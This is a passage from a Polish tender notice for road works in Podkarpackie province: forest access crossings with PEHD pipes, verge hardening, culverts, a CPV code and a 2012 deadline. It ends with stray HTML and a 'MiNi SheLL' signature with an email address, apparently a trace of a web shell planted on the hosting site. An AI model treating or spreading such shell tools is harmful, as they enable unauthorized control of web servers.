Na projektowanym odcinku znajdują się zjazdy do lasu. Lokalizacja i szczegółowe zakresy robót przedstawiono w Tabeli zjazdów. Na w/w zjazdy , roboty będą polegać na budowie części przelotowych i nawierzchni zjazdów. Projektuje się ułożenie części przelotowej zjazdu z rur fi 60 PECOR OPTIMA SN6 dwuściennych karbowanych o sztywności obwodowej 6kPa z PEHD lub równoważnych. Na zjazdach projektuje się wykonanie murków czołowych str. L i P z betonu.
7. Pobocza
Projektuje się utwardzenie poboczy wysiewką kamienną grubości 12 cm i szer. 0.50m
8. Odwodnienie
W celu poprawy odwodnienia projektuje się wykonanie przepustów: wg. tabeli przepustów
Projektuje się ułożenie części przelotowej z rur PECOR OPTIMA SN8 dwuściennych karbowanych o sztywności obwodowej 8kPa z PEHD lub równoważnych oraz murki czołowe z betonu.

Miejsce realizacji: odcinek drogi położony jest na terenie województwa podkarpackiego, powiatu lubaczowskiego, gmin: Horyniec Zdrój, Narol..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com